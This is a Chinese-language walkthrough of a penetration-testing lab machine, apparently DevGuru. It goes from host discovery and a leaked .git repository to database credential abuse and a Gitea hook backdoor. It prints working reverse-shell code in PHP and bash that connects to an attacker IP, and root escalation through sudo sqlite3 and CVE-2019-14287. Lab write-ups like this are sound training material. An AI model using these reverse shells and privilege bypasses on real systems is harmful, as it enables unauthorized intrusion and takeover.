1 信息收集

1.1 主机发现

arp-scan -l

发现主机IP地址为“192.168.1.11

1.2 端口发现

nmap -sS -sV -A -T5 -p- 192.168.1.11

发现端口为：22，80，8585

1.3 目录扫描

dirsearch -u 192.168.1.11   

发现存在git泄露

2 文件和端口访问

2.1 80 端口访问

2.2 8585端口

发现是一个git平台

2.3 adminer.php

是数据库管理器

2.4 backend/backend/auth

页面是:管理员后台登录

3 渗透过程

3.1 git泄露

由于80端口网站存在Git源码泄露，通过GitHack下载其Git源码，如下：

GitHack地址

https://github.com/lijiejie/GitHack

python GitHack.py -u http://192.168.1.11/.git/

查看config文件中的database.php文件

发现mysql的账号和密码。

3.2 数据库添加用户

登录adminer.php后台地址

发现用户

新建一个用户test,密码为123456，提到管理员

3.3 登录后台

用户密码：test/123456

3.4 写入反弹shell

写入反弹shell，地址为kali地址，端口为7777端口，nc监听7777端口

function onStart(){
//nc监听7777端口
    $s=fsockopen("192.168.1.52",7777);
    $proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}
​

监听7777端口

┌──(root㉿xuegod52)-[~/桌面]
└─# nc -lvnp 7777
listening on [any] 7777 ...
​

访问主页面

反弹成功

3.5 获取gitea密码

权限还是太低了，再提高shell权限

再/var/下发现备份文件app.ini.bak

文件有如下内容

还是回到adminer.php用上边提供的账号密码和数据库进行登录

在user表下发现frank用户数据，加密方式是pbkdf2

还是老办法，无法解密就尝试给他改密码，修改加密方式

3.5.1 修改frank密码

修改加密方式为：Bcrypt

密码改为：123456

加密网站：Bcrypt密码生成计算器 - 计算专家

修改后如下

用账号密码登录8585端口的后端frank/123456

3.5.2 写入反弹shell

写入反弹shell，注意最下边点保存

进入项目 >> Settings >> Git Hooks >> Update 写上bash反弹命令保存，Kali这边nc监听，更新项目任意文件即可收到会话。

bash -c "exec bash -i >& /dev/tcp/192.168.1.52/5555 0>&1"      
  

保存后kali启动监听，在项目中任意修改文件并保存，即可拿到shell

http://192.168.1.11:8585/frank/devguru-website/_edit/master/README.md

4 提权

4.1 sudo 提权

首先使用sudo -l查看可以使用sudo提权的命令，在GTFOBins中搜索sqlite3

sudo sqlite3 /dev/null '.shell /bin/sh'

版本问题，sudo 又有个历史漏洞

就是 sudo 版本 1.8.21 存在 CVE-2019-14287 漏洞 CVE-2019-14287：sudo权限绕过漏洞分析与复现_运行

漏洞复现

将命令修改整理后：

sudo -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/sh'